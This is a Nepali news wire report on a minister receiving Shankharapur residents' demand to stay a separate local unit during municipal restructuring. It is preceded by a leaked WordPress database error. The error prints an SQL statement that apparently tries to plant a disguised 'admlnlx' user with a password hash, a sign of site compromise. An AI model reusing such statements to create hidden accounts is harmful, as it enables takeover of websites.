WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnB0XqlMlvn1SZPxKg8XXuYzJlhiZg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 18:48:27', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २८ –
सङ्घीय मामिला तथा स्थानीय विकासमन्त्री हितराज पाण्डेले स्थानीय तह पुनःसंरचना आयोगको प्रतिवेदनमा देखिएको असन्तुष्टिलाई सरकाले समेटेर लैजाने बताउनुभएको छ ।
स्थानीय तह पुनःसंरचना गर्दा शङ्खरापुर नगरपालिकालाई छुट्टै स्थानीय तह बनाउनुपर्ने मागसहित शङ्खरापुर नागरिक समाजले बुझाएको ज्ञापनपत्र ग्रहण गर्दै उहाँले भन्नुभयो – आफ्नो संयोजकत्वमा गठन भएको समितिले शङ्खरापुरवासीको असन्तुष्टि हल गर्न अध्ययन गरी सुझावसहित मन्त्रिपरिषद्मा पेस गर्ने जानकारी दिनुभयो ।
मन्त्री पाण्डेले स्थानीय तह पुनःसंरचनाको काम अत्यन्त जटिल भएको बताउँदै शङ्खरापुरवासीलाई कुनै पनि विरोधका कार्यक्रम नगर्न अनुरोध गर्नुभयो ।
ज्ञापनपत्र बुझाउँदै शङ्खरापुर नागरिक समाजका संयोजक रुपेशलाल श्रेष्ठले ऐतिहासिक एवम् पहिचानयुक्त शङ्खरापुरलाई अन्य कुनै नगरपालिकामा समायोजन गर्न नपाइने बताउनुभयो ।
ज्ञापनपत्रमा करिब तीन हजार ३०० वर्ष अघि राजा शङ्खदेवले माता बज्रयोगिनीका निर्देशनमा सात गाउँ मिलाएर हजार घर, त्यसमा चाहिने बगौँचा, खुल्ला क्षेत्र, चोक, नदी, मन्दिर, इनार, धारा, पोखरी आदी राखी दाहिने शङ्ख आकारमा निर्माण गरिएको यस ऐतिहासिक एवम् पौराणिक शङ्खरापुर क्षेत्रलाई छुट्टै स्थानीय तह बनाउन माग गरिएको छ ।
शङ्खरापुरलाई छुट्टै स्थानीय तह बनाउन नगरपालिकाको सर्वदलीय संयन्त्रबाट सर्वसम्मतिले पास गरी जिल्ला प्राविधिक समितिलाई सिफारिस गरिएपनि आयोगले यसलाई कागेश्वरी मनहरा नगरपालिकामा समाजोजन गरेको भन्दै शङ्खरापुरवासीले विरोध गर्दै आएका छन् । – रासस